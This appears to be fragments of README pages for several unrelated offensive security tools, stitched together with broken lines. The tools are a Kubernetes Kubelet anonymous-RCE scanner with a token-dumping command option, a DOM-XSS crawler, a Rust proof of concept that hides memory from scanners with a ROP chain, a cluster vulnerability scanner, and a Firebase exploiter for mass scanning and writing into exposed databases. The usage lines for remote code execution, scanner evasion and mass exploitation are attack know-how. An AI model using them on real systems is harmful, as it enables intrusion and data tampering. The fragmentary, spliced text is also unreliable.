-t / --target | Target (IP, domain or file) | Mandatory | -t localhost,127.0.0.1 / -t ./domain.txt |
--node-scan | Enable node port scanning (port 30000 to 32767) | Optionnal | -t localhost --node-scan |
--anon-rce | RCE using Kubelet API anonymous auth | Optionnal | -t localhost --anon-rce |
-x | Command to execute when using RCE (display service account token by default) | Optionnal | -t localhost --anon-rce -x "ls -al" |
Target
Scanning
Vulnerabilities
See the open issues for a full list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)Distributed under the MIT License. See LICENSE.txt
for more information.
Rolix - @Rolix_cy - rolixcy@protonmail.com
Project Link: https://github.com/Rolix44/Kubestroyer
It's a Burp Suite's extension to allow for recursive crawling and scanning of Single Page Applications.
It runs a Chromium browser to scan the webpage for DOM-based XSS.
It can also collect all the requests (XHR, fetch, websockets, etc) issued during the crawling allowing them to be forwarded to Burp's Proxy, Repeater and Intruder.
It requires node and DOMDig.
Latest release can be downloaded here
node
's executable and the path of domdig.js
in the extension's UI.Burp DOM Scanner uses DOMDig as the crawling and scanning engine.
DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and it can scan single page applications (SPA) recursively. Unlike other scanners, DOMDig can crawl any webapplication (including gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests and it can simulate a real user interaction by firing events. During this process, XSS payloads are put into input fields and their execution is tracked in order to find injection points and the related URL modifications.
Details about usage, performed checks and reported vulnerabilities, can be found at DOMDig's page
This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.
The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.
The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.
The overview of the process is as follows:
This process repeats indefinitely.
As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.
Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:
C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile the code and run the tool:
C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe
This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).
~/.kube/config
) is properly configured for the target cluster.deploy/kubei.yaml
is used to deploy and configure Kubei on your cluster.IGNORE_NAMESPACES
env variable to ignore specific namespaces. Set TARGET_NAMESPACE
to scan a specific namespace, or leave empty to scan all namespaces.MAX_PARALLELISM
env variable for the maximum number of simultaneous scanners.SEVERITY_THRESHOLD
threshold will be reported. Supported levels are Unknown
, Negligible
, Low
, Medium
, High
, Critical
, Defcon1
. Default is Medium
.DELETE_JOB_POLICY
env variable to define whether or not to delete completed scanner jobs. Supported values are:All
- All jobs will be deleted.Successful
- Only successful jobs will be deleted (default).Never
- Jobs will never be deleted.kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
kubectl -n kubei get pod -lapp=kubei
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
deploy/kubei.yaml
.exploit.json
to upload during exploitURI path
for exploitThis will display help for the CLI tool. Here are all the required arguments it supports.
FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:
go install -v github.com/securebinary/firebaseExploiter@latest
To scan a specific domain to check for Insecure Firebase DB.
To exploit a Firebase DB to write your own JSON document in it.
Create your own exploit.json
file in proper JSON format to exploit vulnerable Firebase DBs.
Checking the exploited URL to verify the vulnerability.
Adding custom path
for exploiting Firebase DBs.
Mass scanning for Insecure Firebase Databases from list of target hosts.
Exploiting vulnerable Firebase DBs from the list of target hosts.
FirebaseExploiter
is made with love by the SecureBinary
team. Any tweaks / community contribution are welcome.